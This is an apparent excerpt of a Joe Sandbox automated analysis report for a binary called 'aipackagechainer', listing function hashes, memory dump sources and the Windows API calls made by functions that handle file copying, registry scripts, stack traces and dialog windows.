                                          • API String ID:
                                          • Opcode ID: f145b9a722d335a9652985f41f82af5a006bc341a7cd4a90f5a9942a34311b74
                                          • Instruction ID: fa32d7f899bd31692df6e9cef4688a691bc68793cf673230652a3bc03d9e9e65
                                          • Opcode Fuzzy Hash: f145b9a722d335a9652985f41f82af5a006bc341a7cd4a90f5a9942a34311b74
                                          • Instruction Fuzzy Hash: E0E17A74A00B098FCB64CF68C580AAEB7F1AF49314F24465AE4569B391D732ED86CB71
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 42bab21d4e795bb23d96338c5985ce07c46b01e22c226741d6e91b7fc45a48ab
                                          • Instruction ID: c04256dc86929d38fc0f8b08dcb74f344cd3c6684843b17dc7344c33ed9d9894
                                          • Opcode Fuzzy Hash: 42bab21d4e795bb23d96338c5985ce07c46b01e22c226741d6e91b7fc45a48ab
                                          • Instruction Fuzzy Hash: 5EF180745182649FD318CF1AE8E083AB7E1FBCD301F848A1EF59687751C734AA66CB61
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94177871e511802e0cda5a0f20559aec7bf80757d85f2763a814e33c076b422d
                                          • Instruction ID: c47ef35d14b51e79a2a848b55762e75bc7977f3e554a06c789218dc738528249
                                          • Opcode Fuzzy Hash: 94177871e511802e0cda5a0f20559aec7bf80757d85f2763a814e33c076b422d
                                          • Instruction Fuzzy Hash: 3CC19A74A00B468FCB78CF68C590ABEBBF1AF05314F28461BD5569B392C732AD45CB61
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff65f42f12fa2d9e034971d81f5d3763b3d2803ba3a0b1d15eb2731b719e3193
                                          • Instruction ID: 3f8616fd6b10f767027f4688925ec923e9d89b8b4a4414a84539a5f77a58615f
                                          • Opcode Fuzzy Hash: ff65f42f12fa2d9e034971d81f5d3763b3d2803ba3a0b1d15eb2731b719e3193
                                          • Instruction Fuzzy Hash: 6771A275E0425A8FCB18CF6CC9416AEB7F2EB58350F158269D906EB384E630ED41CBD4
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9df776428863033476983c642271569f3a84338df48397368705b4e09cc3ad42
                                          • Instruction ID: 974ccc8cf4239338f94e5db866653d19b27d44f8e147519ebf40657b0a761a71
                                          • Opcode Fuzzy Hash: 9df776428863033476983c642271569f3a84338df48397368705b4e09cc3ad42
                                          • Instruction Fuzzy Hash: A861AF75A043468FC754CF2DC88066ABBE2FFD4350F29892DE59AC7251E730E945CB82
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ca6a5bc58de809013063d6a2681a055a54a9f030fd3cdf8c7f79c10b0e74bf7e
                                          • Instruction ID: 40f5ebb7f0ad37c78f2c8bc84f4a4dcca668e2e7b4c187958be6e1247d076230
                                          • Opcode Fuzzy Hash: ca6a5bc58de809013063d6a2681a055a54a9f030fd3cdf8c7f79c10b0e74bf7e
                                          • Instruction Fuzzy Hash: 4A413A72B046614BCB288B2C8C94B6DF6D2D7D5324F0AC77DD897A72C5C5758C09C791
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e81f87ea06f13a3d8fce88f51c0d2e89d04263d343eb0357ba226d3fdedf34e3
                                          • Instruction ID: 908152acfc0d18ae6f89da309423913e8ee0fc23750ae75014e025b18ca289b3
                                          • Opcode Fuzzy Hash: e81f87ea06f13a3d8fce88f51c0d2e89d04263d343eb0357ba226d3fdedf34e3
                                          • Instruction Fuzzy Hash: 3F312771B041750BD7608B7E8C4063ABAD1EBC6301B5942BAE4D4DB741D679E80EDBE0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc2f4606307114d84482083c9021a294b13120769adfe01b4de42cae7e95416e
                                          • Instruction ID: 5e7106561decce1ea057e5d3279f396f128416703a5f4f5eff7f7740dd34e347
                                          • Opcode Fuzzy Hash: fc2f4606307114d84482083c9021a294b13120769adfe01b4de42cae7e95416e
                                          • Instruction Fuzzy Hash: 9621A5367709064B9B4CCB29DC77AB932D1E385305788D27DEA5BC7791D7388462C780
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f3395c45eef9510d8e6ba7a1e4d1d4521fa8a1af8b18e96eb7d1c28856ff8121
                                          • Instruction ID: faf4f0de673a04e2eefd32f461d961c888cea1f277881f50fac60216b7b66fe0
                                          • Opcode Fuzzy Hash: f3395c45eef9510d8e6ba7a1e4d1d4521fa8a1af8b18e96eb7d1c28856ff8121
                                          • Instruction Fuzzy Hash: 672174715202765BD31ACE1DC844ABAF795FB85306F81C32EED80DB289C639E925D7D0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e12790dad87ec2532e809a9eef8ff034ad4c78d338c3fea1aea289e885726f6
                                          • Instruction ID: cdea07f4f2287b0bacbbcce11486cf8e1416aa634107edf6ee3c239e76a2931c
                                          • Opcode Fuzzy Hash: 9e12790dad87ec2532e809a9eef8ff034ad4c78d338c3fea1aea289e885726f6
                                          • Instruction Fuzzy Hash: 50114C315201314BDB19CA1CC885B7AB395EB85311F86C32ADD41AB148C624FD15D3D0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80c6bdc6b4215ec2eb7a84eba296c4c059d5960de37835bda912bace0ed7f662
                                          • Instruction ID: 8bccb395e6c027484e9fc5e2c37e50130145c1e1163690fcd70becea18dce12e
                                          • Opcode Fuzzy Hash: 80c6bdc6b4215ec2eb7a84eba296c4c059d5960de37835bda912bace0ed7f662
                                          • Instruction Fuzzy Hash: B1F03032620328ABCB26DB4CD905A9973E8EB45B51F155467F502EB251C6B0DE50CBE0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 927bd4ffbdd7e72436beec622101bafa26e057f3d016b1e19f736927d408e671
                                          • Instruction ID: a05b794e9d657a49d266770b00d02381b4ceaf6a57e28e1683b367511527c4af
                                          • Opcode Fuzzy Hash: 927bd4ffbdd7e72436beec622101bafa26e057f3d016b1e19f736927d408e671
                                          • Instruction Fuzzy Hash: C6E08C32921278EBCB14DB8CCA44A9AF3FCEB48B00B1180A7B906D3301C270DE00C7E0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4abff39c02b2234bcca4f74f3b2e18b81a818528b53d25de1ea754c51a0bb0eb
                                          • Instruction ID: 8b644711db7b158a1385d15546c32c2e71e3c5e56b4e829ec0c286c0a27ec92b
                                          • Opcode Fuzzy Hash: 4abff39c02b2234bcca4f74f3b2e18b81a818528b53d25de1ea754c51a0bb0eb
                                          • Instruction Fuzzy Hash: 95C08C38200B8547DE29CD1883753B43394E7D2792F88198EC8034B782C61EAC82D623
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,D11C52E5,?,00000000), ref: 000B0873
                                          • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0891
                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,000AB47B,?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF), ref: 000B08BE
                                          • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B08C8
                                          • FileTimeToSystemTime.KERNEL32(000AB47B,001119E0,?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?), ref: 000B094D
                                          • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0957
                                          • SystemTimeToFileTime.KERNEL32(001119E0,000AB47B,?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?), ref: 000B098F
                                          • SystemTimeToFileTime.KERNEL32(001119CE,0010BA4C,?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?), ref: 000B09B0
                                          • CompareFileTime.KERNEL32(0010BA4C,000AB47B,?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?), ref: 000B09C2
                                          • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0A5F
                                          • CreateFileW.KERNEL32(?,C0000000,00000000,0000000C,00000002,00000080,00000000,S-1-5-18,?,00000001,S-1-1-0,?,00000001), ref: 000B0ACE
                                          • GetLastError.KERNEL32(?,00000001,S-1-1-0,?,00000001,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B), ref: 000B0ADE
                                          • CloseHandle.KERNEL32(00000000,?,00000001,S-1-1-0,?,00000001,?,?,?,?,?,?,?,000FAA0D,000000FF), ref: 000B0AE6
                                          • CopyFileExW.KERNEL32(?,?,000B1030,00111978,00000000,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF), ref: 000B0B49
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0B53
                                          • DeleteFileW.KERNEL32(001115A4,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0BC4
                                          • MoveFileW.KERNEL32(?,001115A4), ref: 000B0BCE
                                          • CopyFileW.KERNEL32(?,001115A4,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0BE1
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0BEB
                                            • Part of subcall function 00082BA0: LoadLibraryW.KERNEL32(Advapi32.dll), ref: 00082C32
                                            • Part of subcall function 00082BA0: GetLastError.KERNEL32 ref: 00082C60
                                            • Part of subcall function 00082BA0: GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 00082C76
                                            • Part of subcall function 00082BA0: FreeLibrary.KERNEL32(00000000), ref: 00082C8F
                                            • Part of subcall function 00082BA0: GetLastError.KERNEL32 ref: 00082C9C
                                            • Part of subcall function 00083110: LocalFree.KERNEL32(?,?,?), ref: 00083129
                                            • Part of subcall function 00083110: LocalFree.KERNEL32(?,80004005), ref: 00083139
                                            • Part of subcall function 00083110: GetLastError.KERNEL32(?,80004005), ref: 00083177
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0C16
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: File$ErrorLast$Time$FreeSystem$CopyCreateDeleteLibraryLocal$AddressCloseCompareExistsHandleLoadMovePathProc
                                          • String ID: .part$S-1-1-0$S-1-5-18$p1Wu
                                          • API String ID: 1651364885-2314883101
                                          • Opcode ID: e3239ff9aa9f26d7d0210fbc1ffd994cb1a77c058d26dbbdd7d639c0ce5143df
                                          • Instruction ID: e9fc36e1fdc344872510c55c085cee30976dd08fdc579c3d93176c63c881b979
                                          • Opcode Fuzzy Hash: e3239ff9aa9f26d7d0210fbc1ffd994cb1a77c058d26dbbdd7d639c0ce5143df
                                          • Instruction Fuzzy Hash: 20E1AA30A00744AFEB60DBA5CC88BABBBF4FF44714F14461CE596976E1DBB4A944CB50
                                          APIs
                                          • CoTaskMemAlloc.OLE32(?,D11C52E5,00000000,00000000), ref: 0007F039
                                          • CharNextW.USER32(?,00000000), ref: 0007F0B9
                                          • CharNextW.USER32(00000000,?,00000000), ref: 0007F0BE
                                          • CharNextW.USER32(00000000,?,00000000), ref: 0007F0C3
                                          • CharNextW.USER32(00000000,?,00000000), ref: 0007F0C8
                                          • CharNextW.USER32(?,?,00000000,00000001,D11C52E5,00000000,00000000), ref: 0007F113
                                          • CharNextW.USER32(?,?,00000000,00000001,D11C52E5,00000000,00000000), ref: 0007F123
                                          • CharNextW.USER32(00000000,}},00000009,?,00000000,00000001,D11C52E5,00000000,00000000), ref: 0007F19F
                                          • CharNextW.USER32(00000000,?,00000000,00000001,D11C52E5,00000000,00000000), ref: 0007F1CD
                                          • EnterCriticalSection.KERNEL32(-00000005,00000001,D11C52E5,00000000,00000000), ref: 0007F21D
                                          • lstrcmpiW.KERNEL32(?,?), ref: 0007F241
                                          • LeaveCriticalSection.KERNEL32(?), ref: 0007F257
                                          • LeaveCriticalSection.KERNEL32(?,?,?), ref: 0007F290
                                          • CharNextW.USER32(00000000,?,?), ref: 0007F2E2
                                          • CharNextW.USER32(?,00000000,00000001,D11C52E5,00000000,00000000), ref: 0007F301
                                          • CoTaskMemFree.OLE32(00000000,D11C52E5,00000000,00000000), ref: 0007F34B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CharNext$CriticalSection$LeaveTask$AllocEnterFreelstrcmpi
                                          • String ID: }}$HKCR$HKCU{Software{Classes
                                          • API String ID: 3576304915-1142484189
                                          • Opcode ID: f5172b788844644b94a28c2fb2490db654b70844ca878dc394dba0d17ef61cfb
                                          • Instruction ID: 71d1d6d1ea13bf2e2e3c1853a5955cfe8145d9a7660680e506bb6dcbe6428945
                                          • Opcode Fuzzy Hash: f5172b788844644b94a28c2fb2490db654b70844ca878dc394dba0d17ef61cfb
                                          • Instruction Fuzzy Hash: B2D1D270D04286DFDB20DFA8C854BBEBBF4EF45300F148569E809EB296E7789945CB94
                                          APIs
                                          • InitializeCriticalSection.KERNEL32(00129B64,D11C52E5), ref: 000899B3
                                          • EnterCriticalSection.KERNEL32(00129B64,D11C52E5), ref: 000899C8
                                          • GetCurrentProcess.KERNEL32 ref: 000899D5
                                          • GetCurrentThread.KERNEL32 ref: 000899E3
                                          • SymSetOptions.DBGHELP(80000016), ref: 00089A0F
                                          • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 00089A7D
                                          • GetProcAddress.KERNEL32(00000000), ref: 00089A84
                                          • SymInitialize.DBGHELP(00000000,00000000,00000001,0010C418,00000000), ref: 00089ACC
                                          • StackWalk.DBGHELP(0000014C,?,?,?,?,00000000,00000000,*** Stack Trace (x86) ***,?,?,?), ref: 00089C0F
                                          • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,?,?,?), ref: 00089CC0
                                          • SymCleanup.DBGHELP(?,?), ref: 00089DA2
                                          • LeaveCriticalSection.KERNEL32(00129B64,?), ref: 00089DCD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalSection$CurrentInitialize$AddressCleanupEnterHandleLeaveLibraryLoadModuleOptionsProcProcessStackThreadWalk
                                          • String ID: *** Stack Trace (x86) ***$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
                                          • API String ID: 4282195395-80696534
                                          • Opcode ID: 8d13db09e7ade42e38cc18a2482d34f285599c5ccf92499f74874c2d72656886
                                          • Instruction ID: 221d92de7f45417efd01714a9fb7e4ca2d3d6cdd34ce079d369359293273378e
                                          • Opcode Fuzzy Hash: 8d13db09e7ade42e38cc18a2482d34f285599c5ccf92499f74874c2d72656886
                                          • Instruction Fuzzy Hash: 61C1D171D006A89FDB24EB64CC89BEEBBB5BF04305F1441DAE449A7292DBB41B84CF51
                                          APIs
                                          • GetDlgItem.USER32(?), ref: 000A86F9
                                          • SendMessageW.USER32(00000000,00000406,00000000,?), ref: 000A870D
                                            • Part of subcall function 000AECD0: GetWindowLongW.USER32(?,000000F0), ref: 000AECF5
                                            • Part of subcall function 000AECD0: GetParent.USER32(?), ref: 000AECFF
                                          • GetDlgItem.USER32(?,0000040A), ref: 000A873C
                                          • SetWindowLongW.USER32(00000000,000000FC,00000000), ref: 000A8777
                                          • GetWindowLongW.USER32(?,000000F0), ref: 000A878C
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000A87A4
                                          • CreateWindowExW.USER32(00000000,tooltips_class32,00000000,00000000,80000000,80000000,00000000,00000000,?,00000000,00000000), ref: 000A87E1
                                          • IsWindow.USER32(00000000), ref: 000A87EB
                                          • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 000A8801
                                            • Part of subcall function 000CA3DA: GetProcessHeap.KERNEL32(00000008,00000008,?,0009718E), ref: 000CA3DF
                                            • Part of subcall function 000CA3DA: HeapAlloc.KERNEL32(00000000), ref: 000CA3E6
                                          • SetWindowTextW.USER32(?,?), ref: 000A88B2
                                          • GetDlgItem.USER32(?,00000002), ref: 000A88FA
                                          • EnableWindow.USER32(00000000,00000000), ref: 000A8903
                                          • GetSystemMenu.USER32(?,00000000), ref: 000A890E
                                          • ModifyMenuW.USER32(00000000,0000F060,00000001,00000000,00000000), ref: 000A892C
                                          • DestroyMenu.USER32(00000000), ref: 000A893E
                                          • SetEvent.KERNEL32(?,000000DA), ref: 000A8959
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$Long$ItemMenu$HeapMessageSend$AllocCreateDestroyEnableEventModifyParentProcessSystemText
                                          • String ID: tooltips_class32
                                          • API String ID: 3996269815-1918224756
                                          • Opcode ID: 3c43fce19d815cfd6a48e0f22d44ea07ac24a8a7e743311fc8eceefca3596971
                                          • Instruction ID: 576ed89c92dacc012eaf703225ec2e85cdcb6f90aeae10685b48625b303b0209
                                          • Opcode Fuzzy Hash: 3c43fce19d815cfd6a48e0f22d44ea07ac24a8a7e743311fc8eceefca3596971
                                          • Instruction Fuzzy Hash: 2781C170600205EFEB109FA4CD4DF6ABBB5FF05710F148268F915AB6E2DB74A941CB61
                                          APIs
                                          • GetDlgItem.USER32(?,000001F6), ref: 0008EDEE
                                          • GetDlgItem.USER32(?,000001F8), ref: 0008EDFB
                                          • GetDlgItem.USER32(?,000001F7), ref: 0008EE3D
                                          • SetWindowTextW.USER32(00000000,?), ref: 0008EE4C
                                          • ShowWindow.USER32(?,00000005), ref: 0008EEB2
                                          • GetDlgItem.USER32(?,000001F7), ref: 0008EED4
                                          • SetWindowTextW.USER32(00000000,?), ref: 0008EEE3
                                          • ShowWindow.USER32(?,00000000), ref: 0008EF48
                                          • ShowWindow.USER32(?,00000000), ref: 0008EF4F
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000616), ref: 0008EF98
                                          • GetDlgItem.USER32(?,00000000), ref: 0008EFCA
                                          • IsWindow.USER32(00000000), ref: 0008EFD4
                                          • IsRectEmpty.USER32(?), ref: 0008EFF1
                                          • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000014,?,00000000,?,?,00000616), ref: 0008F021
                                          Strings
                                          Memory Dump Source
